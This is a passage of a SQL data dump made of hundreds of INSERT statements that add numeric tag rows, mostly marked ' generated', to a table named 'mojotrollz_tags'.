generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2982, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2983, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2984, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2985, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2986, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2987, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2988, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2989, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2990, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2991, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2992, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2993, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2994, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2995, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2996, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2997, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2998, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (2999, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3000, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3001, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3002, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3022, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3042, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3062, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3063, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3065, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3082, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3083, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3084, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3085, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3086, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3087, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3088, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3089, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3090, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3091, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3092, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3093, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3094, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3095, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3096, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3097, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3098, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3099, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3100, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3101, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3102, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3103, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3104, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3105, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3106, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3107, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3108, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3109, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3110, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3112, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3113, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3114, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3115, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3116, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3117, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3118, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3119, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3120, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3121, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3122, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3123, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3124, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3125, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3126, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3127, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3128, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3129, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3130, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3141, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3161, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3182, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3201, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3221, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3261, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3281, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3301, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3321, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3341, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3361, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3362, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3364, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3365, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3367, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3369, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3370, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3371, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3372, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3375, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3376, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3377, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3378, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3379, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3380, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3382, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3385, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3402, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3421, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3441, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3442, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3443, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3444, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3445, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3446, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3447, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3448, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3449, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3450, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3451, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3452, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3453, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3454, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3462, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3463, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3483, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3501, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3502, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3503, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3504, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3505, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3507, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3508, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3509, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3510, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3511, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3512, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3514, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3517, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3518, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3519, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3520, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3521, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3522, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3523, 4, 1, 129, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3523, 4, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3524, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3525, 4, 1, 129, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3525, 4, 2, 722, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3526, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3527, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3528, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3541, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3542, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3561, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3562, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3563, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3564, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3565, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3566, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3567, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3568, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3569, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3570, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3601, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3602, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3621, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3625, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3626, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3627, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3628, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3629, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3630, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3631, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3632, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3633, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3634, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3635, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3636, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3637, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3638, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3639, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3640, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3641, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3642, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3643, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3644, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3645, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3646, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3647, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3661, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3681, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3701, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3702, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3721, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3741, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3761, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3762, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3763, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3764, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3765, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3781, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3782, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3783, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3784, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3785, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3786, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3787, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3788, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3789, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3790, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3791, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3792, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3801, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3802, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3803, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3804, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3821, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3823, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3824, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3825, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3841, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3842, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3843, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3861, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3881, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3882, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3883, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3901, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3902, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3903, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3904, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3905, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3906, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3907, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3908, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3909, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3912, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3913, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3921, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3922, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3923, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3924, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3941, 4, 1, 1, ' generated'); INSERT 